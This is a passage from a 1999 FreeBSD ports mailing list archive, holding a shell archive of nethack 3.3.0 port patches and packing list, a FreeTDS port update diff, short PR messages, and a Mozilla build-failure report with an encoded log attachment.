# BSD/OS 2.0 X@@ -199,7 +199,7 @@ X # X # X X-WINLIB = $(WINTTYLIB) X+WINLIB = $(WINTTYLIB) $(WINX11LIB) X X # any other strange libraries your system needs (for Sysunix only -- the more X # specialized targets should already be right) X@@ -223,7 +223,7 @@ X # IRIX 4.0.x needs -lsun if NIS (YP) is being used for passwd file lookup X # LIBS = -lsun X # X-LIBS = X+LIBS = -lSM -lICE X X # make NetHack X GAME = nethack END-of-./patches/patch-ad echo x - ./patches/patch-ac sed 's/^X//' >./patches/patch-ac << 'END-of-./patches/patch-ac' X--- ./include/unixconf.h.orig Sat Dec 11 00:20:51 1999 X+++ ./include/unixconf.h Sun Dec 12 20:45:41 1999 X@@ -135,7 +135,7 @@ X * A stat system call is done on the mailbox every MAILCKFREQ moves. X */ X X-#define MAIL /* Deliver mail during the game */ X+/* #define MAIL /* Deliver mail during the game */ X X /* The Andrew Message System does mail a little differently from normal X * UNIX. Mail is deposited in the user's own directory in ~/Mailbox END-of-./patches/patch-ac echo x - ./patches/patch-ab sed 's/^X//' >./patches/patch-ab << 'END-of-./patches/patch-ab' X--- ./include/system.h.orig Sat Dec 11 00:20:51 1999 X+++ ./include/system.h Sun Dec 12 20:44:40 1999 X@@ -80,7 +80,7 @@ X # if !defined(SUNOS4) || defined(RANDOM) X E void FDECL(srandom, (unsigned int)); X # else X-# ifndef bsdi X+# if !defined(bsdi) && !defined(__FreeBSD__) X E int FDECL(srandom, (unsigned int)); X # endif X # endif X@@ -516,7 +516,7 @@ X # if defined(ULTRIX) || defined(SYSV) || defined(MICRO) || defined(VMS) || defined(MAC) || (defined(HPUX) && defined(_POSIX_SOURCE)) X E time_t FDECL(time, (time_t *)); X # else X-E long FDECL(time, (time_t *)); X+E time_t FDECL(time, (time_t *)); X # endif /* ULTRIX */ X X #ifdef VMS END-of-./patches/patch-ab echo x - ./patches/patch-aa sed 's/^X//' >./patches/patch-aa << 'END-of-./patches/patch-aa' X--- ./include/config.h.orig Sat Dec 11 00:20:49 1999 X+++ ./include/config.h Sun Dec 12 20:28:09 1999 X@@ -43,7 +43,7 @@ X * Some combinations make no sense. See the installation document. X */ X #define TTY_GRAPHICS /* good old tty based graphics */ X-/* #define X11_GRAPHICS */ /* X11 interface */ X+#define X11_GRAPHICS /* X11 interface */ X /* #define QT_GRAPHICS */ /* Qt interface */ X X /* X@@ -92,7 +92,7 @@ X * would allow: X * xpmtoppm x11tiles_big.xpm X */ X-/* # define USE_XPM */ /* Disable if you do not have the XPM library */ X+# define USE_XPM /* Disable if you do not have the XPM library */ X # ifdef USE_XPM X # define GRAPHIC_TOMBSTONE /* Use graphical tombstone (rip.xpm) */ X # endif X@@ -133,11 +133,11 @@ X X #ifdef UNIX X /* path and file name extension for compression program */ X-#define COMPRESS "/usr/bin/compress" /* Lempel-Ziv compression */ X-#define COMPRESS_EXTENSION ".Z" /* compress's extension */ X+/* #define COMPRESS "/usr/bin/compress"*/ /* Lempel-Ziv compression */ X+/* #define COMPRESS_EXTENSION ".Z" */ /* compress's extension */ X /* An example of one alternative you might want to use: */ X-/* #define COMPRESS "/usr/local/bin/gzip" */ /* FSF gzip compression */ X-/* #define COMPRESS_EXTENSION ".gz" */ /* normal gzip extension */ X+#define COMPRESS "/usr/local/bin/gzip" /* FSF gzip compression */ X+#define COMPRESS_EXTENSION ".gz" /* normal gzip extension */ X #endif X X #ifndef COMPRESS X@@ -168,7 +168,7 @@ X * otherwise it will be the current directory. X */ X # ifndef HACKDIR X-# define HACKDIR "/usr/games/lib/nethackdir" /* nethack directory */ X+# define HACKDIR "/usr/local/share/nethack" /* nethack directory */ X # endif X X /* END-of-./patches/patch-aa echo x - ./patches/patch-af sed 's/^X//' >./patches/patch-af << 'END-of-./patches/patch-af' X--- ./sys/unix/Makefile.doc.orig Mon Dec 13 14:49:15 1999 X+++ ./sys/unix/Makefile.doc Mon Dec 13 14:44:53 1999 X@@ -31,7 +31,7 @@ X X X GAME = nethack X-MANDIR = /usr/man/man6 X+MANDIR = ${PREFIX}/man/man X MANEXT = 6 X X # manual installation for most BSD-style systems X@@ -48,11 +48,11 @@ X # DLBMANCREATE = nroff -man dlb.6 > X X manpages: X- -$(GAMEMANCREATE) $(MANDIR)/$(GAME).$(MANEXT) X- -$(LEVMANCREATE) $(MANDIR)/lev_comp.$(MANEXT) X- -$(DGNMANCREATE) $(MANDIR)/dgn_comp.$(MANEXT) X- -$(RCVRMANCREATE) $(MANDIR)/recover.$(MANEXT) X- -$(DLBMANCREATE) $(MANDIR)/dlb.$(MANEXT) X+ -$(GAMEMANCREATE) $(MANDIR)$(MANEXT)/$(GAME).$(MANEXT) X+ -$(LEVMANCREATE) $(MANDIR)$(MANEXT)/lev_comp.$(MANEXT) X+ -$(DGNMANCREATE) $(MANDIR)$(MANEXT)/dgn_comp.$(MANEXT) X+ -$(RCVRMANCREATE) $(MANDIR)$(MANEXT)/recover.$(MANEXT) X+ -$(DLBMANCREATE) $(MANDIR)$(MANEXT)/dlb.$(MANEXT) X X # manual creation for distribution X DISTRIB = Guidebook.txt nethack.txt lev_comp.txt dgn_comp.txt recover.txt dlb.txt END-of-./patches/patch-af echo c - ./files mkdir -p ./files > /dev/null 2>&1 echo x - ./files/md5 sed 's/^X//' >./files/md5 << 'END-of-./files/md5' XMD5 (nethack-3.3.0.tar.gz) = cf9f4039408321f39c3ef733455cb73a END-of-./files/md5 echo c - ./pkg mkdir -p ./pkg > /dev/null 2>&1 echo x - ./pkg/PLIST sed 's/^X//' >./pkg/PLIST << 'END-of-./pkg/PLIST' Xbin/nethack Xshare/nethack/nethack X@exec mkdir %D/share/nethack/save X@exec chmod -R 775 %D/share/nethack X@exec chmod 2755 %D/share/nethack/nethack X@exec chown games.games %D/share/nethack/save X@unexec rm -rf %D/share/nethack/save Xshare/doc/nethack/Guidebook.txt Xshare/nethack/Arc-fila.lev Xshare/nethack/Arc-filb.lev Xshare/nethack/Arc-goal.lev Xshare/nethack/Arc-loca.lev Xshare/nethack/Arc-strt.lev Xshare/nethack/Bar-fila.lev Xshare/nethack/Bar-filb.lev Xshare/nethack/Bar-goal.lev Xshare/nethack/Bar-loca.lev Xshare/nethack/Bar-strt.lev Xshare/nethack/Cav-fila.lev Xshare/nethack/Cav-filb.lev Xshare/nethack/Cav-goal.lev Xshare/nethack/Cav-loca.lev Xshare/nethack/Cav-strt.lev Xshare/nethack/Hea-fila.lev Xshare/nethack/Hea-filb.lev Xshare/nethack/Hea-goal.lev Xshare/nethack/Hea-loca.lev Xshare/nethack/Hea-strt.lev Xshare/nethack/Kni-fila.lev Xshare/nethack/Kni-filb.lev Xshare/nethack/Kni-goal.lev Xshare/nethack/Kni-loca.lev Xshare/nethack/Kni-strt.lev Xshare/nethack/Mon-fila.lev Xshare/nethack/Mon-filb.lev Xshare/nethack/Mon-goal.lev Xshare/nethack/Mon-loca.lev Xshare/nethack/Mon-strt.lev Xshare/nethack/Pri-fila.lev Xshare/nethack/Pri-filb.lev Xshare/nethack/Pri-goal.lev Xshare/nethack/Pri-loca.lev Xshare/nethack/Pri-strt.lev Xshare/nethack/Ran-fila.lev Xshare/nethack/Ran-filb.lev Xshare/nethack/Ran-goal.lev Xshare/nethack/Ran-loca.lev Xshare/nethack/Ran-strt.lev Xshare/nethack/Rog-fila.lev Xshare/nethack/Rog-filb.lev Xshare/nethack/Rog-goal.lev Xshare/nethack/Rog-loca.lev Xshare/nethack/Rog-strt.lev Xshare/nethack/Sam-fila.lev Xshare/nethack/Sam-filb.lev Xshare/nethack/Sam-goal.lev Xshare/nethack/Sam-loca.lev Xshare/nethack/Sam-strt.lev Xshare/nethack/Tou-fila.lev Xshare/nethack/Tou-filb.lev Xshare/nethack/Tou-goal.lev Xshare/nethack/Tou-loca.lev Xshare/nethack/Tou-strt.lev Xshare/nethack/Val-fila.lev Xshare/nethack/Val-filb.lev Xshare/nethack/Val-goal.lev Xshare/nethack/Val-loca.lev Xshare/nethack/Val-strt.lev Xshare/nethack/Wiz-fila.lev Xshare/nethack/Wiz-filb.lev Xshare/nethack/Wiz-goal.lev Xshare/nethack/Wiz-loca.lev Xshare/nethack/Wiz-strt.lev Xshare/nethack/air.lev Xshare/nethack/asmodeus.lev Xshare/nethack/astral.lev Xshare/nethack/baalz.lev Xshare/nethack/bigrm-1.lev Xshare/nethack/bigrm-2.lev Xshare/nethack/bigrm-3.lev Xshare/nethack/bigrm-4.lev Xshare/nethack/bigrm-5.lev Xshare/nethack/castle.lev Xshare/nethack/cmdhelp Xshare/nethack/data Xshare/nethack/dungeon Xshare/nethack/earth.lev Xshare/nethack/fakewiz1.lev Xshare/nethack/fakewiz2.lev Xshare/nethack/fire.lev Xshare/nethack/help Xshare/nethack/hh Xshare/nethack/history Xshare/nethack/juiblex.lev Xshare/nethack/knox.lev Xshare/nethack/license Xshare/nethack/medusa-1.lev Xshare/nethack/medusa-2.lev Xshare/nethack/minefill.lev Xshare/nethack/minend-1.lev Xshare/nethack/minend-2.lev Xshare/nethack/minetn-1.lev Xshare/nethack/minetn-2.lev Xshare/nethack/opthelp Xshare/nethack/options Xshare/nethack/oracle.lev Xshare/nethack/oracles Xshare/nethack/orcus.lev Xshare/nethack/quest.dat Xshare/nethack/rumors Xshare/nethack/sanctum.lev Xshare/nethack/soko1-1.lev Xshare/nethack/soko1-2.lev Xshare/nethack/soko2-1.lev Xshare/nethack/soko2-2.lev Xshare/nethack/soko3-1.lev Xshare/nethack/soko3-2.lev Xshare/nethack/soko4-1.lev Xshare/nethack/soko4-2.lev Xshare/nethack/tower1.lev Xshare/nethack/tower2.lev Xshare/nethack/tower3.lev Xshare/nethack/valley.lev Xshare/nethack/water.lev Xshare/nethack/wizard1.lev Xshare/nethack/wizard2.lev Xshare/nethack/wizard3.lev Xshare/nethack/wizhelp X@mode 664 Xshare/nethack/logfile Xshare/nethack/record Xshare/nethack/perm X@dirrm share/nethack X@dirrm share/doc/nethack END-of-./pkg/PLIST echo x - ./pkg/COMMENT sed 's/^X//' >./pkg/COMMENT << 'END-of-./pkg/COMMENT' XA dungeon explorin', slashin', hackin' game END-of-./pkg/COMMENT echo x - ./pkg/DESCR sed 's/^X//' >./pkg/DESCR << 'END-of-./pkg/DESCR' XThis is version 3.3.0 of nethack, a clasic hack'n'slash adventure game. XYou and your faithful feline (or commited canine) are on a quest to retrieve Xthe lost Amulet of Yendor. Good luck! X XWWW: http://www.nethack.org/ X X- David Xdscheidt@enteract.com END-of-./pkg/DESCR exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AEAB714E5C for ; Mon, 13 Dec 1999 12:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA22135; Mon, 13 Dec 1999 12:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 12:40:02 -0800 (PST) Message-Id: <199912132040.MAA22135@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: David Scheidt Subject: Re: ports/15442: Patch for ports/games/nethack Reply-To: David Scheidt Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15442; it has been noted by GNATS. From: David Scheidt To: Satoshi - Ports Wraith - Asami Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: ports/15442: Patch for ports/games/nethack Date: Mon, 13 Dec 1999 14:36:29 -0600 (CST) On 12 Dec 1999, Satoshi - Ports Wraith - Asami wrote: > * From: David Scheidt > > * 3.3.0 has a bunch of changes to it. They have seperated out character class > * from race, for instance. The net effect is that the saved-game files are > * not compatible. So I think there needs to be both a 3.2.3 and 3.3.0 > * version. I'll take a look at 3.3.0, and seee if I can get it built. > > Ok. Please let me know when you have a 3.3.0 port ready, and I'll do > a repo copy. The port is in pr ports/15469 . I must say that I am very impressed with how slick the ports makefiles are. Very cool. Regards, David > > -PW > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 13:15:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D687814DAC; Mon, 13 Dec 1999 13:15:09 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA26793; Mon, 13 Dec 1999 13:15:09 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Mon, 13 Dec 1999 13:15:09 -0800 (PST) From: Message-Id: <199912132115.NAA26793@freefall.freebsd.org> To: billf@FreeBSD.org, freebsd-ports@FreeBSD.org, asami@FreeBSD.org Subject: Re: ports/15463: [!!!] new port net/sagemerlin contains work directory Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Old Synopsis: new port net/sagemerlin contains work directory New Synopsis: [!!!] new port net/sagemerlin contains work directory Responsible-Changed-From-To: freebsd-ports->asami Responsible-Changed-By: billf Responsible-Changed-When: Mon Dec 13 13:13:54 PST 1999 Responsible-Changed-Why: Asami needs to back this out immediatly. This committer would do it, but respects the ports freeze. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 13:20: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 372BE15243 for ; Mon, 13 Dec 1999 13:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA27134; Mon, 13 Dec 1999 13:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 13:20:03 -0800 (PST) Message-Id: <199912132120.NAA27134@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Domas Mituzas Subject: ports/15453: Update FreeTDS from 0.47pre2 to 0.50] Reply-To: Domas Mituzas Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15453; it has been noted by GNATS. From: Domas Mituzas To: freebsd-gnats-submit@freebsd.org Cc: Subject: ports/15453: Update FreeTDS from 0.47pre2 to 0.50] Date: Mon, 13 Dec 1999 23:19:10 +0200 >Number: 15453 >Category: ports >Synopsis: Update FreeTDS from 0.47pre2 to 0.50 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 23:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yung-Jeng Hung >Release: FreeBSD 3.3-STABLE i386 >Organization: CCU CSIE, Taiwan >Environment: FreeBSD ritax.dorm.ccu.edu.tw 3.4-RC FreeBSD 3.4-RC #3: Mon Dec 13 09:14:36 CST 1999 root@ritax.dorm.ccu.edu.tw:/usr/src/sys/compile/RITAX i386 >Description: FreeTDS version 5.0 has new features such as TDS 7.0 support, hostfile BCP for dblib, writetext support for dblib, and others. There is a chage-request before (PR ports/15143, from 0.47pre2 to 0.47), but never commited. >How-To-Repeat: >Fix: diff -Nru freetds/Makefile freetds-current/Makefile --- freetds/Makefile Mon Nov 29 11:07:51 1999 +++ freetds-current/Makefile Mon Dec 13 15:00:24 1999 @@ -1,12 +1,11 @@ # New ports collection makefile for: freetds -# Version required: 0.47pre2 +# Version required: 0.50 # Date created: 02 Nov 1999 # Whom: Domas Mituzas # # $FreeBSD: /ctm/FreeBSD/anoncvs/cvs/ports/databases/freetds/Makefile,v 1.1.1. -DISTNAME= freetds-0.47pre2 -PKGNAME= freetds-0.47p2 +DISTNAME= freetds-0.50 CATEGORIES= databases MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= ALPHA/freetds @@ -17,6 +16,9 @@ WRKSRC= ${WRKDIR}/freetds GNU_CONFIGURE= yes +CONFIGURE_ARGS= --prefix=${PREFIX} \ + --with-tdsver=7.0 \ + --enable-dbmfix USE_GMAKE= yes .include diff -Nru freetds/files/md5 freetds-current/files/md5 --- freetds/files/md5 Mon Nov 29 11:07:51 1999 +++ freetds-current/files/md5 Fri Dec 10 17:42:16 1999 @@ -1 +1 @@ -MD5 (freetds-0.47pre2.tgz) = b7e36074bf1f0e2dfbb53b1eebc9c6f0 +MD5 (freetds-0.50.tgz) = 06bfb775de2b903fd43163b102cbd16b diff -Nru freetds/patches/patch-aa freetds-current/patches/patch-aa --- freetds/patches/patch-aa Thu Jan 1 08:00:00 1970 +++ freetds-current/patches/patch-aa Mon Dec 13 12:18:18 1999 @@ -0,0 +1,30 @@ +--- Makefile.in.orig Sun Dec 5 07:14:52 1999 ++++ Makefile.in Mon Dec 13 11:54:52 1999 +@@ -77,7 +77,7 @@ + EXTRA_DIST = interfaces src/tds/client.42_1 src/tds/client.42_2 + + +-DEFDIR = $(prefix) ++DEFDIR = $(prefix)/etc/freetds + ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_CLEAN_FILES = +diff -ru freetds.origin/src/tds/util.c freetds/src/tds/util.c +--- src/tds/util.c.orig Fri Nov 12 09:15:05 1999 ++++ src/tds/util.c Mon Dec 13 11:51:56 1999 +@@ -261,13 +261,14 @@ + + /* + * if we haven't found the server yet then look in $SYBBASE/interfaces fil ++ * FreeBSD: $SYBBASE/etc/freetds/interfaces + */ + if (ip_addr[0]=='\0') + { + char *sybase = getenv("SYBASE"); + if (sybase!=NULL && sybase[0]!='\0') + { +- search_interface_file(sybase, "interfaces", server, ip_addr, ip_port ++ search_interface_file(sybase, "etc/freetds/interfaces", server, ip_a + } + } + diff -Nru freetds/pkg/PLIST freetds-current/pkg/PLIST --- freetds/pkg/PLIST Mon Nov 29 11:07:51 1999 +++ freetds-current/pkg/PLIST Mon Dec 13 12:10:45 1999 @@ -1,3 +1,4 @@ +etc/freetds/interfaces include/bkpublic.h include/cspublic.h include/cstypes.h @@ -11,7 +12,6 @@ include/tds.h include/tdsutil.h include/tdsver.h -interfaces lib/libct.a lib/libct.la lib/libct.so.0 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 15: 4:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mailext04.compaq.com (mailext04.compaq.com [207.18.199.42]) by hub.freebsd.org (Postfix) with ESMTP id E721E14C40; Mon, 13 Dec 1999 15:04:07 -0800 (PST) (envelope-from grog@mojave.worldwide.lemis.com) Received: by mailext04.compaq.com (Postfix, from userid 12345) id 63C84104B8C; Mon, 13 Dec 1999 17:04:07 -0600 (CST) Received: from mailint01.im.hou.compaq.com (mailint01.compaq.com [207.18.199.34]) by mailext04.compaq.com (Postfix) with ESMTP id 4445CFB101; Mon, 13 Dec 1999 17:04:07 -0600 (CST) Received: by mailint01.im.hou.compaq.com (Postfix, from userid 12345) id 4981B825C3; Mon, 13 Dec 1999 17:04:00 -0600 (CST) Received: from mojave.worldwide.lemis.com (unknown [155.186.83.42]) by mailint01.im.hou.compaq.com (Postfix) with ESMTP id DD41F78B42; Mon, 13 Dec 1999 17:03:59 -0600 (CST) Received: (from grog@localhost) by mojave.worldwide.lemis.com (8.9.3/8.9.3) id MAA00815; Sat, 11 Dec 1999 12:14:51 -0600 (CST) (envelope-from grog) Date: Sat, 11 Dec 1999 12:14:51 -0600 From: Greg Lehey To: kiri@pis.toba-cmt.ac.jp Cc: ports@FreeBSD.ORG, me@FreeBSD.ORG Subject: Re: editors/xemacs21 merged (1/2) Message-ID: <19991211121451.B760@mojave.worldwide.lemis.com> Reply-To: Greg Lehey References: <199912100848.RAA59354@pis.toba-cmt.ac.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <199912100848.RAA59354@pis.toba-cmt.ac.jp>; from kiri@pis.toba-cmt.ac.jp on Fri, Dec 10, 1999 at 05:48:24PM +0900 WWW-Home-Page: http://www.lemis.com/~grog X-PGP-Fingerprint: 6B 7B C3 8C 61 CD 54 AF 13 24 52 F8 6D A4 95 EF Organization: LEMIS, PO Box 460, Echunga SA 5153, Australia Phone: +61-8-8388-8286 Fax: +61-8-8388-8725 Mobile: +61-41-739-7062 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Friday, 10 December 1999 at 17:48:24 +0900, kiri@pis.toba-cmt.ac.jp wrote: [-- message/partial is unsupported (use 'v' to view this part) --] How do I read this message? Greg -- Finger grog@lemis.com for PGP public key See complete headers for address and phone numbers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 15:21:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nod.noc.best.net (nod.noc.best.net [205.149.163.100]) by hub.freebsd.org (Postfix) with ESMTP id ACAE3150F4 for ; Mon, 13 Dec 1999 15:21:14 -0800 (PST) (envelope-from caine@nod.noc.best.net) Received: (from caine@localhost) by nod.noc.best.net (8.9.3/8.9.3) id PAA01120 for ports@FreeBSD.org; Mon, 13 Dec 1999 15:21:10 -0800 (PST) (envelope-from caine) Date: Mon, 13 Dec 1999 15:21:10 -0800 (PST) From: Caine Message-Id: <199912132321.PAA01120@nod.noc.best.net> To: ports@FreeBSD.org Subject: New nethack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please oh please update this port to 3.3.0 Thanks so much, Gabe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 16:10:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thelab.hub.org (nat196.191.mpoweredpc.net [142.177.196.191]) by hub.freebsd.org (Postfix) with ESMTP id D28DE14BEF for ; Mon, 13 Dec 1999 16:10:36 -0800 (PST) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id UAA61702; Mon, 13 Dec 1999 20:10:10 -0400 (AST) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Mon, 13 Dec 1999 20:10:10 -0400 (AST) From: The Hermit Hacker To: reg@shale.csir.co.za Cc: freebsd-ports@freebsd.org Subject: Mozilla port broken under 4.0-CURRENT? Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-747155401-945130210=:74675" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-747155401-945130210=:74675 Content-Type: TEXT/PLAIN; charset=US-ASCII Just upgraded my system, and tried to compile Mozilla, and it gets down to compiling the 'tools' subdirectory before failing, with the failure being attached... This is a -current system updated to yesterday... Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org --0-747155401-945130210=:74675 Content-Type: APPLICATION/octet-stream; name="typescript.gz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="typescript.gz" H4sICNKJVTgAA3R5cGVzY3JpcHQA7Zptc9o4EIC/8yt2ejPFTWqMDSSgm35o m2SGmbTpHLnr3bWdYGwBuhjJI8uh6a+/tQHH+IWAm/twhE5qY73srp5drSSw 48IoZJ77K0xm9i0FxgNle14tfvrS+kbgnCsqGZ+AyyR1lJD3MDTCQBouvTN8 IVVgzOdzYyZ+MM+zjbmQt8mDK2ZGIB0jVlFPCf0o1DSSqQSMKLiCUxgLCcOl +noj1faS2ndPqd96Epn1muOi+cILitFZT4AuFo+Kjo9BF9B3vU+2DKhsCNAd ANDHXOhSKYaf6HeH+ooJHoD+Ga3AqyP4HZUBluGDL1hkjG5Lpqb4PLJdfRxy J+qiO3agog54022PTaIOAvt6wnapq98xqUI7Ehnc87h3MLVdMccPaIAn+CS+ gH724erv/uXl25v3l/3zj9egM+54oUuh0TDwDw0as4nu0nHQQClXLdBnPuWK hTPQfeZTvKqppLaLldHwPvXf4+3sanD916fzN19fXEhK3w3O2l9fYHF/IdRl gTJWenYvXD1jQewZTzi2l2pVUJi0/dM0fzt5KH7wj+P7kdMIhBz9Liac/aAu iNg/MFwNEh3rmL4XBgT6/A65p5qsga3XUlZ4bGRMHEeP7qzVPdFDfsvFnOtj hDMK3HajaViNbsNcGWZMjo+NQKHGWWMaqYKV32HoeHYQAFvUwkv4PNAyRa/q pBZ1YV4U4LFAF8ZSzOCnbRKJUVbndQ2y/2Ila0xJu0OeEEXnhMDclhwnKAGX 4sClHWMRYxhiqzoswjyAiSdGGP+pNrV1wyKqM6qmwoXhnUBHJtWExHfNmdoS jl7DAi9WD3zqsDFzFioXnNdkmqaZso9xphjGyI/ERB5NXJzvCiQdU0m5Q1cO fTvC3LIQBS/rC5ISIyzEFqm6eu08yRrIo91b0wc+ioqSly0n4QynKZgxmZQA QlIP2prWV/XccDpVh3OBwYcLxoUIuZtYnBtYYavMENdcXj7EQlGEFBZrJdbl AKRjJImCfpSUxzaO9SgXM0mdtkPQZEa4A+VEXSQOu5eTLm2ZoX16uhXtUnGE lFZpG6zNh95J8wAlB6XXPkDJQrGalZPUHkMxK+eUhZRyFJn6LIDmVgAyQpbZ 86FAy1mRH6JlHfy+acEq3NQkwt4J9750kUrteR5Wu4Klq3XwwZabhqvRP3ia LNgxXN/7FE9XO+wXWq3TqtBxz9Of+R6NcNAN+7KSdtnNp7UV8BJhhJRUaKVW /iTqgZKho3Yh3a6cRZ8F6XMezgo4R8U7UG5XX8AjTY/mj6JGGb7d9lZ8iyQR UlSqFVuWw9o2K8/l///Yrefr990S1+88Er3DjGod8tYm0H/Yktkjr+gA/z7C sgPqTrPyOTVW9WgUF7bKYDbN7TgXyiKksFgrMS9HuGNW3gPuCwHr2ceA1Xvm BHZL6A/yd8g0h83oRthvlZJsFKqirJ7UbTjxMq7iC7yBZgH9buWNWqL80Sgv bZnxQM/cygOl4ggprdI2WJvzw0nnACUP5aRyLtxfKIUz9mL1m2Z+wq6qNszX ID7Nw7W4pSghP2NPO5X3Jfvrh9Ne5a0KSrHRhVQ+CqW0ZXbBzhz8N3xZXCwv DpbiKm2DuTkq3Vb13zmXgfoolLKG2UDpbvdrZ4k0QspqtHJL8zyqp7D95HF6 iI81Ht0DjzUe1bPqfvJopr9XGy5Xase/odMbxscCF/ybG7oSEBfVYcYmUxW9 WRgG1IWQJxjxCQeipixI3oLaZneRLAAbthdJmx3OYb3qX67t8RJqNpvdA5YC LNW/G9orLA8v2B4dHcGX1Hux3+BcSiHBfLpXfZfv4C7kmSudy3d9V/qsVP3P 6VtqKlMTlS4+O8KlWFAbKOFH+Mt1NLK9zP+y1y9AvzNViy+1gSOZrxbvd6Pz PuD/M+qA2QIMZUzslglmr9er/Qu0C4aShi4AAA== --0-747155401-945130210=:74675-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 16:40: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BDADC151BE for ; Mon, 13 Dec 1999 16:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA44692; Mon, 13 Dec 1999 16:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 7478C151BE; Mon, 13 Dec 1999 16:31:51 -0800 (PST) Message-Id: <19991214003151.7478C151BE@hub.freebsd.org> Date: Mon, 13 Dec 1999 16:31:51 -0800 (PST) From: james@ja.ath.cx To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15473: port lang/squeak2: CC not settable. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15473 >Category: ports >Synopsis: port lang/squeak2: CC not settable. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 16:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Andariese >Release: 3.3 >Organization: >Environment: FreeBSD emr.itacs.to 3.3-STABLE FreeBSD 3.3-STABLE #1: Wed Dec 1 00:25:15 AKST 1999 root@emr.itacs.to:/usr/src/sys/compile/SUPERFRIEND i386 >Description: CC not settable in port, lang/squeak2 >How-To-Repeat: >Fix: begin 644 squeak2.diff.gz M'XL(",'=4#@``W-Q=65A:S(N9&EF9@#-56UOFT@0_@R_8M18E1%>FY?&B9$L MV26VB^*7U-CI5:I445CB;3!0,'>YB_S?N[M@0G`:-=>3KA;R,+,SLS///+MX MQ/T< 